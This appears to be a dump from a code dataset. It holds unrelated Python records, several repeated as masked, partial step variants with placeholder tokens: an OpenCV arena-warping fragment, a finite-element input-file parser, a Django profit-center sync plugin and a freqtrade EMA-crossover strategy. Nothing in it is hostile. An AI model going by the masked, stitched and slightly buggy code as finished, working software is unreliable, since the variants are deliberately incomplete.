processed_arena = cv2.bitwise_not(processed_arena)\n\n # # Color Enhancement: Does Not Help in color detection\n # ycrcb = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2YCR_CB)\n # y, cr, cb = cv2.split(ycrcb)\n # cv2.equalizeHist(y, y)\n # ycrcb = cv2.merge((y, cr, cb))\n # processed_arena = cv2.cvtColor(ycrcb, cv2.COLOR_YCR_CB2BGR)\n #\n # # Shadow Removal- Not Used since Removes Shape Detail\n # shadow = cv2.cvtColor(processed_arena, cv2.COLOR_BGR2GRAY)\n # ret, shadow = cv2.threshold(shadow, 10, 255, cv2.THRESH_BINARY_INV)\n # shadow = cv2.cvtColor(shadow, cv2.COLOR_GRAY2BGR)\n # processed_arena = cv2.add(processed_arena, shadow)\n\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(processed_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(processed_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n # cv2.imshow('Display', processed_arena)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n # processed_arena: to be used for Object Detection\n return processed_arena, warped_arena\n\n\n\"\"\"\n* Function Name: get_robot_space\n* Input: frame - (raw camera feed of the arena)\n* Output: warped portion of arena\n* Logic: Warps a portion of the arena to which the robot position\n is mapped to avoid parallax\n* Example Call: robot_space = get_robot_space(frame)\n\"\"\"\n\n\ndef get_robot_space(frame):\n # Denoising: bilateral filter Kernel size of 99 (Preferred Over medianBlur to maintain edge info)\n frame = cv2.bilateralFilter(frame, 5, 99, 198)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n source_pts = np.float32([[24, 56], [27, 444], [608, 47], [615, 437]]) #(576, 65) # 53,71 (53, 400) (586, 390)\n\n # Define result dimensions (600 X 900) therefore each block 100 X 100\n result_pts = np.float32([[0, 0], [0, 600], [900, 0], [900, 600]])\n\n # Get transformation matrix\n M = cv2.getPerspectiveTransform(source_pts, 
result_pts)\n\n # Remapping to final desired result image\n warped_arena = cv2.warpPerspective(frame, M, (900, 600))\n\n # Show Grid Lines\n for y in range(0, 6):\n for x in range(0, 9):\n cv2.line(warped_arena, (x * 100, y * 100), (x * 100, (y + 1) * 100), (0, 0, 0), 1)\n cv2.line(warped_arena, (0, y * 100), (900, y * 100), (0, 0, 0), 1)\n\n return warped_arena\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Reader:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Reader:
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {'coordinates': {'count': 0, 'nodes': []},
'element_groups': {'number_of_elements': 0, 'count': 0,
'groups': []}, 'bars': [], 'materials': {'count': 0,
'materials': []}, 'geometric_properties': {'count': 0},
'bcnodes': {'count': 0}, 'loads': {'count': 0}}
with open(filePath, 'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
if len(line) != 0 and line[0] == '*':
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1:
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]),
float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1],
el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if currentGroup.amount == 0:
groupCounter += 1
currentGroup = groups[groupCounter]
print('Group n: {} count: {}'.format(currentGroup.n,
currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]
) - 1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
"""
.format(bar.id, bar.startNode.n, bar.endNode.n, bar
.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter
].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1
].setSectionArea(el[0])
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex
].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
<|reserved_special_token_1|>
from elements import Node, Bar, Material, Group, Load
from pprint import pprint
class Reader:
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {'coordinates': {'count': 0, 'nodes': []},
'element_groups': {'number_of_elements': 0, 'count': 0,
'groups': []}, 'bars': [], 'materials': {'count': 0,
'materials': []}, 'geometric_properties': {'count': 0},
'bcnodes': {'count': 0}, 'loads': {'count': 0}}
with open(filePath, 'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
if len(line) != 0 and line[0] == '*':
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1:
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]),
float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1],
el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if currentGroup.amount == 0:
groupCounter += 1
currentGroup = groups[groupCounter]
print('Group n: {} count: {}'.format(currentGroup.n,
currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]
) - 1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
"""
.format(bar.id, bar.startNode.n, bar.endNode.n, bar
.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter
].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1
].setSectionArea(el[0])
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex
].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(result
['coordinates']['nodes']) if item.n == int(el[0
])), None)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
<|reserved_special_token_1|>
from elements import Node, Bar, Material, Group, Load
from pprint import pprint
# query
# next((e for e in result['coordinates']['nodes'] if e.n == int(el[0])), None)
class Reader:
def read(self, filePath):
"""
Reads text file with nodes and returns the result dict with all objects
and their nested properties
"""
result = {
'coordinates': {
'count': 0,
'nodes': []
},
'element_groups': {
'number_of_elements': 0,
'count': 0,
'groups': []
},
'bars': [],
'materials': {
'count': 0,
'materials': []
},
'geometric_properties': {
'count': 0
},
'bcnodes': {
'count': 0
},
'loads': {
'count': 0
}
}
# print(result['coordinates']['nodes'])
with open(filePath,'r') as f:
lines = f.readlines()
elementCounter = 0
groupCounter = 0
geometricCounter = 0
for line in lines:
line = line.strip()
el = line.split(' ')
if len(line) == 0:
continue
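                # A line starting with '*' opens a new section (e.g. *COORDINATES);
                # following lines belong to it until the next marker.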
if len(line) != 0 and line[0] == "*":
section = line[1:].lower()
continue
if section == 'coordinates':
if len(el) == 1 :
result[section]['count'] = el[0]
else:
result[section]['nodes'].append(Node(int(el[0]), float(el[1]), float(el[2])))
elif section == 'element_groups':
if len(line) == 1:
result[section]['count'] = int(el[0])
else:
result[section]['groups'].append(Group(el[0], el[1], el[2]))
result[section]['number_of_elements'] += int(el[1])
elif section == 'incidences':
groups = result['element_groups']['groups']
nodes = result['coordinates']['nodes']
print(el)
currentGroup = groups[groupCounter]
if (currentGroup.amount == 0):
groupCounter += 1
currentGroup = groups[groupCounter]
print("Group n: {} count: {}".format(currentGroup.n, currentGroup.amount))
bar = Bar(el[0], nodes[int(el[1])-1], nodes[int(el[2])-1], groups[groupCounter])
print(
"""
Bar {} created
Start node: {} End Node: {} Group: {}
""".format(bar.id, bar.startNode.n, bar.endNode.n, bar.group))
result['bars'].append(bar)
currentGroup.amount -= 1
elif section == 'materials':
if len(el) == 1:
result[section]['count'] = el[0]
groupCounter = 0
else:
material = Material(el[0], el[1], el[2])
result[section]['materials'].append(material)
result['element_groups']['groups'][groupCounter].setMaterial(material)
groupCounter += 1
elif section == 'geometric_properties':
if geometricCounter == 0:
result[section]['count'] = el[0]
else:
result['element_groups']['groups'][geometricCounter - 1].setSectionArea(
el[0]
)
geometricCounter += 1
elif section == 'bcnodes':
if len(el) == 1:
result[section]['count'] = el[0]
else:
nodeIndex = next((e for e, item in enumerate(
result['coordinates']['nodes']) if item.n == int(el[0])), None
)
result['coordinates']['nodes'][nodeIndex].setRestriction(int(el[1]))
elif section == 'loads':
if len(el) == 1:
result[section]['count'] = el[0]
else:
load = Load(el[1], el[2])
nodeIndex = next((e for e, item in enumerate(
result['coordinates']['nodes']) if item.n == int(el[0])), None
)
result['coordinates']['nodes'][nodeIndex].addLoad(load)
for bar in result['bars']:
bar.createLocalArray()
print('---------- Parsing complete! ----------')
pprint(result)
print('---------------------------------------')
return result
# Example usage, guarded so the module can still be imported; the input
# file name comes from the original commented-out call:
if __name__ == '__main__':
    reader = Reader()
    reader.read("./arquivoentrada.fem")
|
flexible
|
{
"blob_id": "c796123fbbf3adcde59779a104dcafb30a673a79",
"index": 6422,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Reader:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Reader:\n\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n result = {'coordinates': {'count': 0, 'nodes': []},\n 'element_groups': {'number_of_elements': 0, 'count': 0,\n 'groups': []}, 'bars': [], 'materials': {'count': 0,\n 'materials': []}, 'geometric_properties': {'count': 0},\n 'bcnodes': {'count': 0}, 'loads': {'count': 0}}\n with open(filePath, 'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n if len(line) == 0:\n continue\n if len(line) != 0 and line[0] == '*':\n section = line[1:].lower()\n continue\n if section == 'coordinates':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]),\n float(el[1]), float(el[2])))\n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else:\n result[section]['groups'].append(Group(el[0], el[1],\n el[2]))\n result[section]['number_of_elements'] += int(el[1])\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n currentGroup = groups[groupCounter]\n if currentGroup.amount == 0:\n groupCounter += 1\n currentGroup = groups[groupCounter]\n print('Group n: {} count: {}'.format(currentGroup.n,\n currentGroup.amount))\n bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]\n ) - 1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\"\n .format(bar.id, bar.startNode.n, bar.endNode.n, bar\n .group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter\n ].setMaterial(material)\n groupCounter += 1\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1\n ].setSectionArea(el[0])\n geometricCounter += 1\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex\n ].setRestriction(int(el[1]))\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n for bar in result['bars']:\n bar.createLocalArray()\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n return result\n",
"step-4": "from elements import Node, Bar, Material, Group, Load\nfrom pprint import pprint\n\n\nclass Reader:\n\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n result = {'coordinates': {'count': 0, 'nodes': []},\n 'element_groups': {'number_of_elements': 0, 'count': 0,\n 'groups': []}, 'bars': [], 'materials': {'count': 0,\n 'materials': []}, 'geometric_properties': {'count': 0},\n 'bcnodes': {'count': 0}, 'loads': {'count': 0}}\n with open(filePath, 'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n if len(line) == 0:\n continue\n if len(line) != 0 and line[0] == '*':\n section = line[1:].lower()\n continue\n if section == 'coordinates':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]),\n float(el[1]), float(el[2])))\n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else:\n result[section]['groups'].append(Group(el[0], el[1],\n el[2]))\n result[section]['number_of_elements'] += int(el[1])\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n currentGroup = groups[groupCounter]\n if currentGroup.amount == 0:\n groupCounter += 1\n currentGroup = groups[groupCounter]\n print('Group n: {} count: {}'.format(currentGroup.n,\n currentGroup.amount))\n bar = Bar(el[0], nodes[int(el[1]) - 1], nodes[int(el[2]\n ) - 1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\"\n .format(bar.id, bar.startNode.n, bar.endNode.n, bar\n .group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter\n ].setMaterial(material)\n groupCounter += 1\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1\n ].setSectionArea(el[0])\n geometricCounter += 1\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex\n ].setRestriction(int(el[1]))\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(result\n ['coordinates']['nodes']) if item.n == int(el[0\n ])), None)\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n for bar in result['bars']:\n bar.createLocalArray()\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n return result\n",
"step-5": "from elements import Node, Bar, Material, Group, Load\nfrom pprint import pprint\n\n# query\n# next((e for e in result['coordinates']['nodes'] if e.n == int(el[0])), None)\n\nclass Reader():\n def read(self, filePath):\n \"\"\"\n Reads text file with nodes and returns the result dict with all objects\n and their nested properties\n \"\"\"\n \n result = {\n 'coordinates': {\n 'count': 0,\n 'nodes': []\n },\n 'element_groups': { \n 'number_of_elements': 0,\n 'count': 0,\n 'groups': []\n },\n 'bars': [],\n 'materials': {\n 'count': 0,\n 'materials': []\n },\n 'geometric_properties': {\n 'count': 0\n },\n 'bcnodes': {\n 'count': 0\n },\n 'loads': {\n 'count': 0\n }\n }\n # print(result['coordinates']['nodes'])\n \n with open(filePath,'r') as f:\n lines = f.readlines()\n elementCounter = 0\n groupCounter = 0\n geometricCounter = 0\n\n for line in lines:\n line = line.strip()\n el = line.split(' ')\n \n if len(line) == 0:\n continue\n\n if len(line) != 0 and line[0] == \"*\":\n section = line[1:].lower()\n continue\n \n if section == 'coordinates':\n if len(el) == 1 :\n result[section]['count'] = el[0]\n else:\n result[section]['nodes'].append(Node(int(el[0]), float(el[1]), float(el[2])))\n \n elif section == 'element_groups':\n if len(line) == 1:\n result[section]['count'] = int(el[0])\n else: \n result[section]['groups'].append(Group(el[0], el[1], el[2]))\n result[section]['number_of_elements'] += int(el[1])\n\n elif section == 'incidences':\n groups = result['element_groups']['groups']\n nodes = result['coordinates']['nodes']\n print(el)\n\n currentGroup = groups[groupCounter]\n if (currentGroup.amount == 0):\n groupCounter += 1\n currentGroup = groups[groupCounter]\n \n print(\"Group n: {} count: {}\".format(currentGroup.n, currentGroup.amount))\n \n bar = Bar(el[0], nodes[int(el[1])-1], nodes[int(el[2])-1], groups[groupCounter])\n print(\n \"\"\"\n Bar {} created \n Start node: {} End Node: {} Group: {}\n \"\"\".format(bar.id, bar.startNode.n, bar.endNode.n, bar.group))\n result['bars'].append(bar)\n currentGroup.amount -= 1\n \n elif section == 'materials':\n if len(el) == 1:\n result[section]['count'] = el[0]\n groupCounter = 0\n else:\n material = Material(el[0], el[1], el[2])\n result[section]['materials'].append(material)\n result['element_groups']['groups'][groupCounter].setMaterial(material)\n groupCounter += 1\n\n elif section == 'geometric_properties':\n if geometricCounter == 0:\n result[section]['count'] = el[0]\n else:\n result['element_groups']['groups'][geometricCounter - 1].setSectionArea(\n el[0]\n )\n geometricCounter += 1\n\n elif section == 'bcnodes':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n nodeIndex = next((e for e, item in enumerate(\n result['coordinates']['nodes']) if item.n == int(el[0])), None\n )\n result['coordinates']['nodes'][nodeIndex].setRestriction(int(el[1]))\n\n elif section == 'loads':\n if len(el) == 1:\n result[section]['count'] = el[0]\n else:\n load = Load(el[1], el[2])\n nodeIndex = next((e for e, item in enumerate(\n result['coordinates']['nodes']) if item.n == int(el[0])), None\n )\n result['coordinates']['nodes'][nodeIndex].addLoad(load)\n\n for bar in result['bars']:\n bar.createLocalArray()\n\n print('---------- Parsing complete! ----------')\n pprint(result)\n print('---------------------------------------')\n\n return result\n \n\n# reader = Reader()\n# reader.read(\"./arquivoentrada.fem\")\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
from django.db import transaction
from ralph_scrooge.models import ProfitCenter
from ralph_scrooge.plugins import plugin_runner
from ralph_scrooge.plugins.collect.utils import get_from_ralph
logger = logging.getLogger(__name__)
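# Upserts one profit center from Ralph: get_or_create keyed on ralph3_id,
# then refresh name/description; returns True only when a new row was created.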
@transaction.atomic
def update_profit_center(pc):
profit_center, created = ProfitCenter.objects.get_or_create(
ralph3_id=pc['id'],
defaults=dict(
name=pc['name'],
)
)
profit_center.name = pc['name']
profit_center.description = pc['description']
profit_center.save()
return created
@plugin_runner.register(chain='scrooge')
def ralph3_profit_center(**kwargs):
new_pc = total = 0
for pc in get_from_ralph("profit-centers", logger):
created = update_profit_center(pc)
if created:
new_pc += 1
total += 1
return True, '{} new profit center(s), {} updated, {} total'.format(
new_pc,
total - new_pc,
total,
)
|
normal
|
{
"blob_id": "d3f52d4713ba4b7b4cd736b26809968e259be63c",
"index": 6883,
"step-1": "<mask token>\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-2": "<mask token>\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-4": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\nimport logging\nfrom django.db import transaction\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(ralph3_id=\n pc['id'], defaults=dict(name=pc['name']))\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph('profit-centers', logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(new_pc,\n total - new_pc, total)\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\n\nfrom django.db import transaction\n\nfrom ralph_scrooge.models import ProfitCenter\nfrom ralph_scrooge.plugins import plugin_runner\nfrom ralph_scrooge.plugins.collect.utils import get_from_ralph\n\n\nlogger = logging.getLogger(__name__)\n\n\[email protected]\ndef update_profit_center(pc):\n profit_center, created = ProfitCenter.objects.get_or_create(\n ralph3_id=pc['id'],\n defaults=dict(\n name=pc['name'],\n )\n )\n profit_center.name = pc['name']\n profit_center.description = pc['description']\n profit_center.save()\n return created\n\n\n@plugin_runner.register(chain='scrooge')\ndef ralph3_profit_center(**kwargs):\n new_pc = total = 0\n for pc in get_from_ralph(\"profit-centers\", logger):\n created = update_profit_center(pc)\n if created:\n new_pc += 1\n total += 1\n return True, '{} new profit center(s), {} updated, {} total'.format(\n new_pc,\n total - new_pc,\n total,\n )\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# --- Do not remove these libs ---
from freqtrade.strategy.interface import IStrategy
from typing import Dict, List
from functools import reduce
from pandas import DataFrame
# --------------------------------
import datetime
import talib.abstract as ta
import freqtrade.vendor.qtpylib.indicators as qtpylib
import numpy as np  # noqa
class ema(IStrategy):
max_open_trades = 10
stake_amount = 50
# Minimal ROI designed for the strategy.
# This attribute will be overridden if the config file contains "minimal_roi"
# Optimal stoploss designed for the strategy
# This attribute will be overridden if the config file contains "stoploss"
stoploss = -1
minimal_roi = {
"0": 10
}
# Optimal timeframe for the strategy
timeframe = '5m'
# trailing stoploss
trailing_stop = False
trailing_stop_positive = 0.1
trailing_stop_positive_offset = 0.2
# run "populate_indicators" only for new candle
process_only_new_candles = False
    # Experimental settings (configuration will override these if set)
use_sell_signal = True
sell_profit_only = False
ignore_roi_if_buy_signal = False
# Optional order type mapping
order_types = {
'buy': 'limit',
'sell': 'limit',
'stoploss': 'market',
'stoploss_on_exchange': False
}
def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Adds several different TA indicators to the given DataFrame
Performance Note: For the best performance be frugal on the number of indicators
you are using. Let uncomment only the indicator you are using in your strategies
or your hyperopt configuration, otherwise you will waste your memory and CPU usage.
"""
dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)
dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)
dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)
dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)
        dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']
        dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']
        dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5
dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)
return dataframe
def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the buy signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
        dataframe.loc[
            (
                (qtpylib.crossed_above(dataframe['ema'], dataframe['ema2']))
            ), 'buy'] = 1
return dataframe
def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
"""
Based on TA indicators, populates the sell signal for the given dataframe
:param dataframe: DataFrame
:return: DataFrame with buy column
"""
        dataframe.loc[(qtpylib.crossed_below(dataframe['ema'], dataframe['ema2'])), 'sell'] = 1
return dataframe
|
normal
|
{
"blob_id": "7b047ba110732d1b0a749bcbbaa9b55306ca2071",
"index": 6434,
"step-1": "<mask token>\n\n\nclass ema(IStrategy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
"step-2": "<mask token>\n\n\nclass ema(IStrategy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n dataframe['ema6'] = ta.EMA(dataframe, timeperiod=9)\n dataframe['ema24'] = ta.EMA(dataframe, timeperiod=18)\n dataframe['ema11'] = ta.EMA(dataframe, timeperiod=32)\n dataframe['ema25'] = ta.EMA(dataframe, timeperiod=64)\n dataframe['ema'] = dataframe['ema6'] - dataframe['ema24']\n dataframe['ema2'] = dataframe['ema11'] - dataframe['ema25']\n dataframe['ema'] = dataframe['ema'] * 0.6 + dataframe['ema2'] * 0.5\n dataframe['ema2'] = ta.SMA(dataframe['ema'], timeperiod=29)\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_above(dataframe['ema'], dataframe[\n 'ema2']), 'buy'] = 1\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict\n ) ->DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[qtpylib.crossed_below(dataframe['ema'], dataframe[\n 'ema2']), 'sell'] = 1\n return dataframe\n",
